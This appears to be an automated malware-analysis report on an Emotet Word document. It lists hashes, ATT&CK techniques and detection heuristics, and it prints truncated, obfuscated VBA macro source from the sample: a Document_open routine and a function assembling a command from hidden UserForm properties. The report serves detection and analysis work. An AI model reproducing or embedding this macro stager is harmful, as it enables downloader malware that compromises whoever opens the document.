Emotet Office (OLE) malware analysis — malicious · c99052d6ca6dabd3

MALICIOUS

Office (OLE)

93.7 KB Created: 2019-12-18 22:09:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 5d18b73a8acd65b1c7497367c33b3705 SHA-1: b4058d0270700e3be0daa8e40262f3754668613a SHA-256: c99052d6ca6dabd3ab45f69e1d2141811b4085d7fe6a247656a39160e3c1e3aa

262 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of Emotet activity. The ClamAV detection name 'Doc.Downloader.Emotet-7464930-0' further supports this attribution. The macros likely execute code to download and run a second-stage payload.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7464930-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7464930-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11000 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11000 bytes
SHA-256: `85646354822f474207c7388c28da3b9b8065405706f8cea7b437443a622dca8a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Rnuekdgnz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Aklhsdytvadu, 0, 0, MSForms, TextBox" Private Sub Document_open() Fnwyraaizzj = Ogjykxkgdc Yirgutaiekt = 820 Ileuznrbp = ("Laurie") Lhnryicl = (672) Dim Trjbegijg As Integer Dim Rpcmgmeotoi As Integer Dim Vmfjkwiigzo As Integer Dim Suhisjqqtsle As String Dim Xwsuldvgrazyk As Double Dim Kqntktkhk As Boolean Dim Xxbutesaklofd As Integer Mchjtyul = (575) Dim Ylhcnphx As Double Xexgugjlt = ("Eos voluptate eos ab.") Jekgizbcad = (603) Dim Tvtkxxvghrjc As Double Aompjrmro = Wepgulckmdkbv Xpcsuhydzmq = Ufbhmobsganf Vbqnrdvuxovm = "Enim commodi sit eveniet." Bqtebhqgcdphk = 509 Kqlqkuic = Aarzkjfwlsrg Yzpnguntveyx = 568 Sctlzdxzxdrqf = ("Magni facere officia.") Ukehuslfuvtig = (229) Dim Bmhheiyfgf As Integer Dim Blwqpswbutqie As Integer Dim Yqgvqukcejyqo As Double Dim Ybatjtxfe As Integer Dim Dshvycxlap As Boolean Dim Ddqjsgrbif As Integer Dim Pikxdakcegrsu As Integer Vtcupyqwqs = (457) Dim Znpaxdlgp As Double Izexfxmypjuvh = ("Josefina") Zxymueuulo = (463) Dim Tpjbvdutv As Boolean Lzeuuwer = Ndnidxvoesjq Jfhzrnnpoxnm = Zyhxhlglvt Yfqrruill = "Nostrum maxime." Fzuhxoqvrgk = 328 Ftuoycmovq = Xnyirdfi Kxjxzxkg = 755 Wqumxsmxeav = ("Omnis quos voluptas.") Bhyicmebwdf = (701) Dim Eacpepjcdgsll As Boolean Dim Hdifajiqboh As Double Dim Nanpdanl As Integer Dim Vgamxagwqnn As String Dim Uzinwkbawuhp As String Dim Dikkfmomzzwk As Boolean Dim Sqhothspunrb As Integer Ylswthcngch = (144) Dim Iajqmugi As String Swwanoxtesa = ("Magnam est.") Gaqisekegld = (107) Dim Lxfgngsyaax As Double Zijdodumcpv = Dvilksqyczn Uvpgzsbde = Dxapcjhjuycxq Eqqwjvgjizx = "Animi saepe." Cjlytmimsav = 254 Odmoouhgcoht End Sub Attribute VB_Name = "Afvutucle" Attribute VB_Base = "0{6D21C294-5A0A-46C4-9146-94AE55B0D5C4}{ECBC2FEA-BBAE-4612-B6FE-B738BF045118}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Ixcmyxdxrtr" Function Wzwxawzlswk() Dnasihwb = Fgfpxyxtmweo Kgqeccvwwx = 687 Rjjjpfjvbvqq = ("Phil") Oowkxpxphcqs = (890) Dim Wjjhaghokdhye As String Dim Opawhohzmz As Double Dim Cbgswgkzsmip As Integer Dim Zdtczkcftnq As String Dim Kojxiblfmek As Integer Dim Tvschkvupdfk As Integer Dim Rwitcbpakio As String Pimzjrhrgmq = (400) Dim Awukdnimu As Integer Lhjbskjng = ("Aliquam cumque modi.") Mcdwssxkj = (948) Dim Wasfzebrcv As Double Obhfywdcz = Kshhuqojymyl Mlfmptkmup = Myogpnmgin Gbombvqqywmlx = "Debitis quod ut magnam." Rjxxsmjdpu = 92 Xbvbgxrxhz = Rnuekdgnz.Aklhsdytvadu Bjvaaazo = Ebrbgfeiy Fvdfpizttorkx = 780 Kgczsxalu = ("Vero ipsa atque id.") Nadhssfd = (18) Dim Sukszuwtmqt As Boolean Dim Uxfyjzfk As String Dim Nvzpmvyftkrsl As Boolean Dim Scdrhtisz As String Dim Muvdqeiyxx As Integer Dim Kxolakicm As String Dim Qxbsbdedahc As Integer Jptnjnvks = (403) Dim Tthihqgxycfg As Boolean Hvsuzxiojb = ("Sed.") Uszshxaizhv = (905) Dim Kaekbejeccrd As Integer Zkekgyqvnygv = Glzavypxd Xalsqhpre = Uxoyeomgegwdy Rhrechbc = "Sapiente quas necessitatibus ullam velit iure dolorem." Fdxqqedeiqclx = 969 Ipiwqzcqevo = Xbvbgxrxhz + Afvutucle.Gkecxtky + Afvutucle.Tkmteuts + Afvutucle.Uizvcuedhy Pwbqcbdu = Pkaiykfojxne Gbreyzwllbfk = 885 Quvnkmzu = ("Voluptas aut sed nesciunt.") Uowdppoki = (33) Dim Akzvaxdzyc As Integer Dim Eyobaubu As Integer Dim Kjkctwvnv As String Dim Rpkwrjpwuydgk As Boolean Dim Bnoqhmxwz As String Dim Xdhdlhmfni As Integer Dim Iklysggdz As Boolean Uiyftmutkgf = (676) Dim Oqmwtfewxh As Integer Wofpsmlmo = ("Reprehenderit explicabo.") Nctttotydyyj = (673) Dim Kkuhswatzxxp As Double Utzycuzualkh = Cgxfdvibqf Vtcvvekbejz = Guqkiwlsr Zsliksctcm ... (truncated)

SHA-256: 85646354822f474207c7388c28da3b9b8065405706f8cea7b437443a622dca8a

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Rnuekdgnz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Aklhsdytvadu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Fnwyraaizzj = Ogjykxkgdc
Yirgutaiekt = 820
Ileuznrbp = ("Laurie")
Lhnryicl = (672)
Dim Trjbegijg As Integer
Dim Rpcmgmeotoi As Integer
Dim Vmfjkwiigzo As Integer
Dim Suhisjqqtsle As String
Dim Xwsuldvgrazyk As Double
Dim Kqntktkhk As Boolean
Dim Xxbutesaklofd As Integer
Mchjtyul = (575)
Dim Ylhcnphx As Double
Xexgugjlt = ("Eos voluptate eos ab.")
Jekgizbcad = (603)
Dim Tvtkxxvghrjc As Double
Aompjrmro = Wepgulckmdkbv
Xpcsuhydzmq = Ufbhmobsganf
Vbqnrdvuxovm = "Enim commodi sit eveniet."
Bqtebhqgcdphk = 509
   Kqlqkuic = Aarzkjfwlsrg
Yzpnguntveyx = 568
Sctlzdxzxdrqf = ("Magni facere officia.")
Ukehuslfuvtig = (229)
Dim Bmhheiyfgf As Integer
Dim Blwqpswbutqie As Integer
Dim Yqgvqukcejyqo As Double
Dim Ybatjtxfe As Integer
Dim Dshvycxlap As Boolean
Dim Ddqjsgrbif As Integer
Dim Pikxdakcegrsu As Integer
Vtcupyqwqs = (457)
Dim Znpaxdlgp As Double
Izexfxmypjuvh = ("Josefina")
Zxymueuulo = (463)
Dim Tpjbvdutv As Boolean
Lzeuuwer = Ndnidxvoesjq
Jfhzrnnpoxnm = Zyhxhlglvt
Yfqrruill = "Nostrum maxime."
Fzuhxoqvrgk = 328
   Ftuoycmovq = Xnyirdfi
Kxjxzxkg = 755
Wqumxsmxeav = ("Omnis quos voluptas.")
Bhyicmebwdf = (701)
Dim Eacpepjcdgsll As Boolean
Dim Hdifajiqboh As Double
Dim Nanpdanl As Integer
Dim Vgamxagwqnn As String
Dim Uzinwkbawuhp As String
Dim Dikkfmomzzwk As Boolean
Dim Sqhothspunrb As Integer
Ylswthcngch = (144)
Dim Iajqmugi As String
Swwanoxtesa = ("Magnam est.")
Gaqisekegld = (107)
Dim Lxfgngsyaax As Double
Zijdodumcpv = Dvilksqyczn
Uvpgzsbde = Dxapcjhjuycxq
Eqqwjvgjizx = "Animi saepe."
Cjlytmimsav = 254
Odmoouhgcoht
End Sub

Attribute VB_Name = "Afvutucle"
Attribute VB_Base = "0{6D21C294-5A0A-46C4-9146-94AE55B0D5C4}{ECBC2FEA-BBAE-4612-B6FE-B738BF045118}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ixcmyxdxrtr"
Function Wzwxawzlswk()
   Dnasihwb = Fgfpxyxtmweo
Kgqeccvwwx = 687
Rjjjpfjvbvqq = ("Phil")
Oowkxpxphcqs = (890)
Dim Wjjhaghokdhye As String
Dim Opawhohzmz As Double
Dim Cbgswgkzsmip As Integer
Dim Zdtczkcftnq As String
Dim Kojxiblfmek As Integer
Dim Tvschkvupdfk As Integer
Dim Rwitcbpakio As String
Pimzjrhrgmq = (400)
Dim Awukdnimu As Integer
Lhjbskjng = ("Aliquam cumque modi.")
Mcdwssxkj = (948)
Dim Wasfzebrcv As Double
Obhfywdcz = Kshhuqojymyl
Mlfmptkmup = Myogpnmgin
Gbombvqqywmlx = "Debitis quod ut magnam."
Rjxxsmjdpu = 92
Xbvbgxrxhz = Rnuekdgnz.Aklhsdytvadu
   Bjvaaazo = Ebrbgfeiy
Fvdfpizttorkx = 780
Kgczsxalu = ("Vero ipsa atque id.")
Nadhssfd = (18)
Dim Sukszuwtmqt As Boolean
Dim Uxfyjzfk As String
Dim Nvzpmvyftkrsl As Boolean
Dim Scdrhtisz As String
Dim Muvdqeiyxx As Integer
Dim Kxolakicm As String
Dim Qxbsbdedahc As Integer
Jptnjnvks = (403)
Dim Tthihqgxycfg As Boolean
Hvsuzxiojb = ("Sed.")
Uszshxaizhv = (905)
Dim Kaekbejeccrd As Integer
Zkekgyqvnygv = Glzavypxd
Xalsqhpre = Uxoyeomgegwdy
Rhrechbc = "Sapiente quas necessitatibus ullam velit iure dolorem."
Fdxqqedeiqclx = 969
Ipiwqzcqevo = Xbvbgxrxhz + Afvutucle.Gkecxtky + Afvutucle.Tkmteuts + Afvutucle.Uizvcuedhy
   Pwbqcbdu = Pkaiykfojxne
Gbreyzwllbfk = 885
Quvnkmzu = ("Voluptas aut sed nesciunt.")
Uowdppoki = (33)
Dim Akzvaxdzyc As Integer
Dim Eyobaubu As Integer
Dim Kjkctwvnv As String
Dim Rpkwrjpwuydgk As Boolean
Dim Bnoqhmxwz As String
Dim Xdhdlhmfni As Integer
Dim Iklysggdz As Boolean
Uiyftmutkgf = (676)
Dim Oqmwtfewxh As Integer
Wofpsmlmo = ("Reprehenderit explicabo.")
Nctttotydyyj = (673)
Dim Kkuhswatzxxp As Double
Utzycuzualkh = Cgxfdvibqf
Vtcvvekbejz = Guqkiwlsr
Zsliksctcm
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.